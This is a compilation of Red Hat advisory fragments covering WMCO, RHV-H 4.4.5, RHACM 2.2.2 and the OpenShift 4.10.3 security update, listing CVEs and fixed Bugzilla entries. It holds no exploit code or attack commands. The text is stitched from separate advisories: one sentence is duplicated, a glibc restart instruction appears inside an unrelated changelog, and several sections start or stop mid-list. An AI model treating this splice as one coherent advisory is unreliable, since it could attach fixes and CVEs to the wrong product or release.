https://docs.openshift.com/container-platform/4.7/windows_containers/window s-node-upgrades.html
- Bugs fixed (https://bugzilla.redhat.com/):
1945248 - WMCO patch pub-key-hash annotation to Linux node 1946538 - CVE-2021-25736 kubernetes: LoadBalancer Service type don't create a HNS policy for empty or invalid external loadbalancer IP, what could lead to MITM 1952917 - LoadBalancer Service type with invalid external loadbalancer IP breaks the datapath 1955319 - Telemetry info not completely available to identify windows nodes 1956412 - WMCO incorrectly shows node as ready after a failed configuration 1963263 - kube-proxy service terminated unexpectedly after recreated LB service
- These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Changes to the redhat-release-virtualization-host component:
- Previously, the redhat-support-tool was missing from the RHV-H 4.4 package. In this release, the redhat-support-tool has been added. For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted. Bugs fixed (https://bugzilla.redhat.com/):
1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition 1895832 - RHVH 4.4.3: No response when clicking button "Help" in Anaconda GUI 1907306 - "sysstat" doesn't collect data for upgraded RHVH 1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade 1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected. 1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError 1927395 - RHVH, protecting key packages from being removed. 1928607 - redhat-support-tool is missing from latest RHV-H 4.4 1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5 1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT 1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing 1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async 1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3
-
Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
-
Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.2 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in.
Bug Fix(es):
-
Documentation is referencing deprecated API for Service Export - Submariner (BZ#1936528)
-
Importing of cluster fails due to error/typo in generated command (BZ#1936642)
-
RHACM 2.2.2 images (BZ#1938215)
-
2.2 clusterlifecycle fails to allow provision
fips: trueclusters on aws, vsphere (BZ#1941778) -
Bugs fixed (https://bugzilla.redhat.com/):
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1913333 - CVE-2020-28851 golang.org/x/text: Panic in language.ParseAcceptLanguage while parsing -u- extension
1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag
1914238 - CVE-2020-29529 go-slug: partial protection against zip slip attacks
1928937 - CVE-2021-23337 nodejs-lodash: command injection via template
1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions
1930310 - CVE-2021-23841 openssl: NULL pointer dereference in X509_issuer_and_serial_hash()
1930324 - CVE-2021-23840 openssl: integer overflow in CipherUpdate
1936528 - Documentation is referencing deprecated API for Service Export - Submariner
1936642 - Importing of cluster fails due to error/typo in generated command
1938215 - RHACM 2.2.2 images
1941778 - 2.2 clusterlifecycle fails to allow provision fips: true clusters on aws, vsphere
1942178 - CVE-2021-21321 fastify-reply-from: crafted URL allows prefix scape of the proxied backend service
1942182 - CVE-2021-21322 fastify-http-proxy: crafted URL allows prefix scape of the proxied backend service
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.10.3 security update Advisory ID: RHSA-2022:0056-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:0056 Issue date: 2022-03-10 CVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 CVE-2022-24407 =====================================================================
- Summary:
Red Hat OpenShift Container Platform release 4.10.3 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.3. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2022:0055
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Security Fix(es):
- gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
- grafana: Snapshot authentication bypass (CVE-2021-39226)
- golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
- nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
- golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
- grafana: Forward OAuth Identity Token can allow users to access some data sources (CVE-2022-21673)
- grafana: directory traversal vulnerability (CVE-2021-43813)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-x86_64
The image digest is sha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-s390x
The image digest is sha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le
The image digest is sha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c
All OpenShift Container Platform 4.10 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for moderate instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1808240 - Always return metrics value for pods under the user's namespace
1815189 - feature flagged UI does not always become available after operator installation
1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters
1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly
1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal
1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered
1878925 - 'oc adm upgrade --to ...' rejects versions which occur only in history, while the cluster-version operator supports history fallback
1880738 - origin e2e test deletes original worker
1882983 - oVirt csi driver should refuse to provision RWX and ROX PV
1886450 - Keepalived router id check not documented for RHV/VMware IPI
1889488 - The metrics endpoint for the Scheduler is not protected by RBAC
1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom
1896474 - Path based routing is broken for some combinations
1897431 - CIDR support for additional network attachment with the bridge CNI plug-in
1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes
1907433 - Excessive logging in image operator
1909906 - The router fails with PANIC error when stats port already in use
1911173 - [MSTR-998] Many charts' legend names show {{}} instead of words
1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting.
1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)
1917893 - [ovirt] install fails: due to terraform error "Cannot attach Virtual Disk: Disk is locked" on vm resource
1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1926522 - oc adm catalog does not clean temporary files
1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes.
1928141 - kube-storage-version-migrator constantly reporting type "Upgradeable" status Unknown
1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it's storageclass is not yet finished, confusing users
1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x
1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade
1937085 - RHV UPI inventory playbook missing guarantee_memory
1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion
1938236 - vsphere-problem-detector does not support overriding log levels via storage CR
1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods
1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer
1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]
1942913 - ThanosSidecarUnhealthy isn't resilient to WAL replays.
1943363 - [ovn] CNO should gracefully terminate ovn-northd
1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17
1948080 - authentication should not set Available=False APIServices_Error with 503s
1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set
1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0
1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer
1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs
1953264 - "remote error: tls: bad certificate" logs in prometheus-operator container
1955300 - Machine config operator reports unavailable for 23m during upgrade
1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set
1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set
1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters
1956496 - Needs SR-IOV Docs Upstream
1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret
1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid
1956964 - upload a boot-source to OpenShift virtualization using the console
1957547 - [RFE]VM name is not auto filled in dev console
1958349 - ovn-controller doesn't release the memory after cluster-density run
1959352 - [scale] failed to get pod annotation: timed out waiting for annotations
1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not
1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]
1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects
1961391 - String updates
1961509 - DHCP daemon pod should have CPU and memory requests set but not limits
1962066 - Edit machine/machineset specs not working
1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent
1963053 - oc whoami --show-console should show the web console URL, not the server api URL
1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1964327 - Support containers with name:tag@digest
1964789 - Send keys and disconnect does not work for VNC console
1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7
1966445 - Unmasking a service doesn't work if it masked using MCO
1966477 - Use GA version in KAS/OAS/OauthAS to avoid: "audit.k8s.io/v1beta1" is deprecated and will be removed in a future release, use "audit.k8s.io/v1" instead
1966521 - kube-proxy's userspace implementation consumes excessive CPU
1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up
1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount
1970218 - MCO writes incorrect file contents if compression field is specified
1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]
1970805 - Cannot create build when docker image url contains dir structure
1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io
1972827 - image registry does not remain available during upgrade
1972962 - Should set the minimum value for the --max-icsp-size flag of oc adm catalog mirror
1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run
1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established
1976301 - [ci] e2e-azure-upi is permafailing
1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change.
1976674 - CCO didn't set Upgradeable to False when cco mode is configured to Manual on azure platform
1976894 - Unidling a StatefulSet does not work as expected
1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases
1977414 - Build Config timed out waiting for condition 400: Bad Request
1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus
1978528 - systemd-coredump started and failed intermittently for unknown reasons
1978581 - machine-config-operator: remove runlevel from mco namespace
1979562 - Cluster operators: don't show messages when neither progressing, degraded or unavailable
1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9
1979966 - OCP builds always fail when run on RHEL7 nodes
1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading
1981549 - Machine-config daemon does not recover from broken Proxy configuration
1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]
1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues
1982063 - 'Control Plane' is not translated in Simplified Chinese language in Home->Overview page
1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands
1982662 - Workloads - DaemonSets - Add storage: i18n misses
1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE "/secrets/encryption-config" on single node clusters
1983758 - upgrades are failing on disruptive tests
1983964 - Need Device plugin configuration for the NIC "needVhostNet" & "isRdma"
1984592 - global pull secret not working in OCP4.7.4+ for additional private registries
1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs
1985486 - Cluster Proxy not used during installation on OSP with Kuryr
1985724 - VM Details Page missing translations
1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted
1985933 - Downstream image registry recommendation
1985965 - oVirt CSI driver does not report volume stats
1986216 - [scale] SNO: Slow Pod recovery due to "timed out waiting for OVS port binding"
1986237 - "MachineNotYetDeleted" in Pending state , alert not fired
1986239 - crictl create fails with "PID namespace requested, but sandbox infra container invalid"
1986302 - console continues to fetch prometheus alert and silences for normal user
1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI
1986338 - error creating list of resources in Import YAML
1986502 - yaml multi file dnd duplicates previous dragged files
1986819 - fix string typos for hot-plug disks
1987044 - [OCPV48] Shutoff VM is being shown as "Starting" in WebUI when using spec.runStrategy Manual/RerunOnFailure
1987136 - Declare operatorframework.io/arch. labels for all operators
1987257 - Go-http-client user-agent being used for oc adm mirror requests
1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold
1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP
1988406 - SSH key dropped when selecting "Customize virtual machine" in UI
1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade
1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server"
1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs
1989438 - expected replicas is wrong
1989502 - Developer Catalog is disappearing after short time
1989843 - 'More' and 'Show Less' functions are not translated on several page
1990014 - oc debug does not work for Windows pods
1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created
1990193 - 'more' and 'Show Less' is not being translated on Home -> Search page
1990255 - Partial or all of the Nodes/StorageClasses don't appear back on UI after text is removed from search bar
1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI
1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi- symlinks
1990556 - get-resources.sh doesn't honor the no_proxy settings even with no_proxy var
1990625 - Ironic agent registers with SLAAC address with privacy-stable
1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time
1991067 - github.com can not be resolved inside pods where cluster is running on openstack.
1991573 - Enable typescript strictNullCheck on network-policies files
1991641 - Baremetal Cluster Operator still Available After Delete Provisioning
1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator
1991819 - Misspelled word "ocurred" in oc inspect cmd
1991942 - Alignment and spacing fixes
1992414 - Two rootdisks show on storage step if 'This is a CD-ROM boot source' is checked
1992453 - The configMap failed to save on VM environment tab
1992466 - The button 'Save' and 'Reload' are not translated on vm environment tab
1992475 - The button 'Open console in New Window' and 'Disconnect' are not translated on vm console tab
1992509 - Could not customize boot source due to source PVC not found
1992541 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1992580 - storageProfile should stay with the same value by check/uncheck the apply button
1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply
1992777 - [IBMCLOUD] Default "ibm_iam_authorization_policy" is not working as expected in all scenarios
1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)
1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permfailing
1994094 - Some hardcodes are detected at the code level in OpenShift console components
1994142 - Missing required cloud config fields for IBM Cloud
1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools
1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart
1995335 - [SCALE] ovnkube CNI: remove ovs flows check
1995493 - Add Secret to workload button and Actions button are not aligned on secret details page
1995531 - Create RDO-based Ironic image to be promoted to OKD
1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator
1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
1995924 - CMO should report Upgradeable: false when HA workload is incorrectly spread
1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole
1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN
1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down
1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page
1996647 - Provide more useful degraded message in auth operator on DNS errors
1996736 - Large number of 501 lr-policies in INCI2 env
1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes
1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP
1996928 - Enable default operator indexes on ARM
1997028 - prometheus-operator update removes env var support for thanos-sidecar
1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used
1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller.
1997245 - "Subscription already exists in openshift-storage namespace" error message is seen while installing odf-operator via UI
1997269 - Have to refresh console to install kube-descheduler
1997478 - Storage operator is not available after reboot cluster instances
1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
1997967 - storageClass is not reserved from default wizard to customize wizard
1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order
1998038 - [e2e][automation] add tests for UI for VM disk hot-plug
1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus
1998174 - Create storageclass gp3-csi after install ocp cluster on aws
1998183 - "r: Bad Gateway" info is improper
1998235 - Firefox warning: Cookie “csrf-token” will be soon rejected
1998377 - Filesystem table head is not full displayed in disk tab
1998378 - Virtual Machine is 'Not available' in Home -> Overview -> Cluster inventory
1998519 - Add fstype when create localvolumeset instance on web console
1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses
1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page
1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable
1999091 - Console update toast notification can appear multiple times
1999133 - removing and recreating static pod manifest leaves pod in error state
1999246 - .indexignore is not ingore when oc command load dc configuration
1999250 - ArgoCD in GitOps operator can't manage namespaces
1999255 - ovnkube-node always crashes out the first time it starts
1999261 - ovnkube-node log spam (and security token leak?)
1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -> Operator Installation page
1999314 - console-operator is slow to mark Degraded as False once console starts working
1999425 - kube-apiserver with "[SHOULD NOT HAPPEN] failed to update managedFields" err="failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)
1999556 - "master" pool should be updated before the CVO reports available at the new version occurred
1999578 - AWS EFS CSI tests are constantly failing
1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages
1999619 - cloudinit is malformatted if a user sets a password during VM creation flow
1999621 - Empty ssh_authorized_keys entry is added to VM's cloudinit if created from a customize flow
1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined
1999668 - openshift-install destroy cluster panic's when given invalid credentials to cloud provider (Azure Stack Hub)
1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource
1999771 - revert "force cert rotation every couple days for development" in 4.10
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
1999796 - Openshift Console Helm tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace.
1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions
1999903 - Click "This is a CD-ROM boot source" ticking "Use template size PVC" on pvc upload form
1999983 - No way to clear upload error from template boot source
2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter
2000096 - Git URL is not re-validated on edit build-config form reload
2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig
2000236 - Confusing usage message from dynkeepalived CLI
2000268 - Mark cluster unupgradable if vcenter, esxi versions or HW versions are unsupported
2000430 - bump cluster-api-provider-ovirt version in installer
2000450 - 4.10: Enable static PV multi-az test
2000490 - All critical alerts shipped by CMO should have links to a runbook
2000521 - Kube-apiserver CO degraded due to failed conditional check (ConfigObservationDegraded)
2000573 - Incorrect StorageCluster CR created and ODF cluster getting installed with 2 Zone OCP cluster
2000628 - ibm-flashsystem-storage-storagesystem got created without any warning even when the attempt was cancelled
2000651 - ImageStreamTag alias results in wrong tag and invalid link in Web Console
2000754 - IPerf2 tests should be lower
2000846 - Structure logs in the entire codebase of Local Storage Operator
2000872 - [tracker] container is not able to list on some directories within the nfs after upgrade to 4.7.24
2000877 - OCP ignores STOPSIGNAL in Dockerfile and sends SIGTERM
2000938 - CVO does not respect changes to a Deployment strategy
2000963 - 'Inline-volume (default fs)] volumes should store data' tests are failing on OKD with updated selinux-policy
2001008 - [MachineSets] CloneMode defaults to linkedClone, but I don't have snapshot and should be fullClone
2001240 - Remove response headers for downloads of binaries from OpenShift WebConsole
2001295 - Remove openshift:kubevirt-machine-controllers decleration from machine-api
2001317 - OCP Platform Quota Check - Inaccurate MissingQuota error
2001337 - Details Card in ODF Dashboard mentions OCS
2001339 - fix text content hotplug
2001413 - [e2e][automation] add/delete nic and disk to template
2001441 - Test: oc adm must-gather runs successfully for audit logs - fail due to startup log
2001442 - Empty termination.log file for the kube-apiserver has too permissive mode
2001479 - IBM Cloud DNS unable to create/update records
2001566 - Enable alerts for prometheus operator in UWM
2001575 - Clicking on the perspective switcher shows a white page with loader
2001577 - Quick search placeholder is not displayed properly when the search string is removed
2001578 - [e2e][automation] add tests for vm dashboard tab
2001605 - PVs remain in Released state for a long time after the claim is deleted
2001617 - BucketClass Creation is restricted on 1st page but enabled using side navigation options
2001620 - Cluster becomes degraded if it can't talk to Manila
2001760 - While creating 'Backing Store', 'Bucket Class', 'Namespace Store' user is navigated to 'Installed Operators' page after clicking on ODF
2001761 - Unable to apply cluster operator storage for SNO on GCP platform.
2001765 - Some error message in the log of diskmaker-manager caused confusion
2001784 - show loading page before final results instead of showing a transient message No log files exist
2001804 - Reload feature on Environment section in Build Config form does not work properly
2001810 - cluster admin unable to view BuildConfigs in all namespaces
2001817 - Failed to load RoleBindings list that will lead to ‘Role name’ is not able to be selected on Create RoleBinding page as well
2001823 - OCM controller must update operator status
2001825 - [SNO]ingress/authentication clusteroperator degraded when enable ccm from start
2001835 - Could not select image tag version when create app from dev console
2001855 - Add capacity is disabled for ocs-storagecluster
2001856 - Repeating event: MissingVersion no image found for operand pod
2001959 - Side nav list borders don't extend to edges of container
2002007 - Layout issue on "Something went wrong" page
2002010 - ovn-kube may never attempt to retry a pod creation
2002012 - Cannot change volume mode when cloning a VM from a template
2002027 - Two instances of Dotnet helm chart show as one in topology
2002075 - opm render does not automatically pulling in the image(s) used in the deployments
2002121 - [OVN] upgrades failed for IPI OSP16 OVN IPSec cluster
2002125 - Network policy details page heading should be updated to Network Policy details
2002133 - [e2e][automation] add support/virtualization and improve deleteResource
2002134 - [e2e][automation] add test to verify vm details tab
2002215 - Multipath day1 not working on s390x
2002238 - Image stream tag is not persisted when switching from yaml to form editor
2002262 - [vSphere] Incorrect user agent in vCenter sessions list
2002266 - SinkBinding create form doesn't allow to use subject name, instead of label selector
2002276 - OLM fails to upgrade operators immediately
2002300 - Altering the Schedule Profile configurations doesn't affect the placement of the pods
2002354 - Missing DU configuration "Done" status reporting during ZTP flow
2002362 - Dynamic Plugin - ConsoleRemotePlugin for webpack doesn't use commonjs
2002368 - samples should not go degraded when image allowedRegistries blocks imagestream creation
2002372 - Pod creation failed due to mismatched pod IP address in CNI and OVN
2002397 - Resources search is inconsistent
2002434 - CRI-O leaks some children PIDs
2002443 - Getting undefined error on create local volume set page
2002461 - DNS operator performs spurious updates in response to API's defaulting of service's internalTrafficPolicy
2002504 - When the openshift-cluster-storage-operator is degraded because of "VSphereProblemDetectorController_SyncError", the insights operator is not sending the logs from all pods.
2002559 - User preference for topology list view does not follow when a new namespace is created
2002567 - Upstream SR-IOV worker doc has broken links
2002588 - Change text to be sentence case to align with PF
2002657 - ovn-kube egress IP monitoring is using a random port over the node network
2002713 - CNO: OVN logs should have millisecond resolution
2002748 - [ICNI2] 'ErrorAddingLogicalPort' failed to handle external GW check: timeout waiting for namespace event
2002759 - Custom profile should not allow not including at least one required HTTP2 ciphersuite
2002763 - Two storage systems getting created with external mode RHCS
2002808 - KCM does not use web identity credentials
2002834 - Cluster-version operator does not remove unrecognized volume mounts
2002896 - Incorrect result return when user filter data by name on search page
2002950 - Why spec.containers.command is not created with "oc create deploymentconfig --image= -- "
2003096 - [e2e][automation] check bootsource URL is displaying on review step
2003113 - OpenShift Baremetal IPI installer uses first three defined nodes under hosts in install-config for master nodes instead of filtering the hosts with the master role
2003120 - CI: Uncaught error with ResizeObserver on operand details page
2003145 - Duplicate operand tab titles causes "two children with the same key" warning
2003164 - OLM, fatal error: concurrent map writes
2003178 - [FLAKE][knative] The UI doesn't show updated traffic distribution after accepting the form
2003193 - Kubelet/crio leaks netns and veth ports in the host
2003195 - OVN CNI should ensure host veths are removed
2003204 - Jenkins all new container images (openshift4/ose-jenkins) not supporting '-e JENKINS_PASSWORD=password' ENV which was working for old container images
2003206 - Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2003239 - "[sig-builds][Feature:Builds][Slow] can use private repositories as build input" tests fail outside of CI
2003244 - Revert libovsdb client code
2003251 - Patternfly components with list element has list item bullet when they should not.
2003252 - "[sig-builds][Feature:Builds][Slow] starting a build using CLI start-build test context override environment BUILD_LOGLEVEL in buildconfig" tests do not work as expected outside of CI
2003269 - Rejected pods should be filtered from admission regression
2003357 - QE- Removing the epic tags for gherkin tags related to 4.9 Release
2003426 - [e2e][automation] add test for vm details bootorder
2003496 - [e2e][automation] add test for vm resources requirment settings
2003641 - All metal ipi jobs are failing in 4.10
